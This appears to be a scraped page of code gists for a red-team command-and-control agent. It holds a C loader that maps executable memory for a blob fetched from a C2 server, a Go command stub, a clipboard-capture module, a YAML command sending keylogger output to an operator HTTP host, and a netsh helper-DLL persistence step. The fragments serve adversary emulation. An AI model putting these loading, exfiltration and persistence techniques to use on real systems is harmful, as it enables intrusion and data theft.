This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// example pie_blob.c | |
int f1(int v, void (* exit)(int)){ | |
(*exit)(0); | |
return v; | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Request the pie_blob module from the C2 server | |
// mmap exectuable memory | |
fptr = mmap(NULL, sb.st_size, PROT_READ | PROT_EXEC | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); | |
// read the blob into memory | |
result = fread(fptr, 1, sb.st_size, pBlob); | |
// grab whatever libraries/symbols I want (or even better, just get pointers to dlsym/dlopen) | |
handle = dlopen(LIBC_FILE, RTLD_LAZY); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
func RunCommand(message string, executor string, payloadPath string) (string, int, int) { | |
if executor == "keyword" { | |
switch message { | |
case "stop agent": | |
os.Exit(0) | |
case "module": | |
// do module stuff | |
default: | |
// do other stuff | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
module.collect.captureClipboard |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#{operator.payloads}/path/to/payload/collect-windows.exe | |
#{operator.payloads}/path/to/payload/collect-linux | |
#{operator.payloads}/path/to/payload/collect-darwin |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package main | |
import () | |
var ( | |
ModuleName = "collect" | |
Functions = map[string]func(args []string) ([]byte, int){ | |
"captureClipboard": captureClipboard, | |
} | |
ExecFunctions = map[string]func(args string) (){ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
command: | | |
module.exfil.httpServer.["#{operator.http}", "#{file.T1056.001}", "#{agent.name}", "#{operator.session}"] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
RunStandalone("GoCapture", "C:\File\Path\To\Capture\into.tmp") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <locale> | |
#include <cstdlib> | |
#include <stdio.h> | |
#include <string> | |
#include <Windows.h> | |
#include "Syscalls.h" | |
LONG GetStringRegKey(HKEY, const std::wstring&, std::wstring&, const std::wstring&); | |
DWORD WINAPI RunBin(LPVOID lpParameter) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
platforms: | |
windows: | |
exec: | |
command: 'netsh.exe add helper #{agent.location}\..\netShHelperDll.dll' | |
payload: '#{operator.payloads}/persistence/netsh/netShHelperDll.dll' | |
cmd: | |
command: 'netsh.exe add helper #{agent.location}\..\netShHelperDll.dll' | |
payload: '#{operator.payloads}/persistence/netsh/netShHelperDll.dll' |
OlderNewer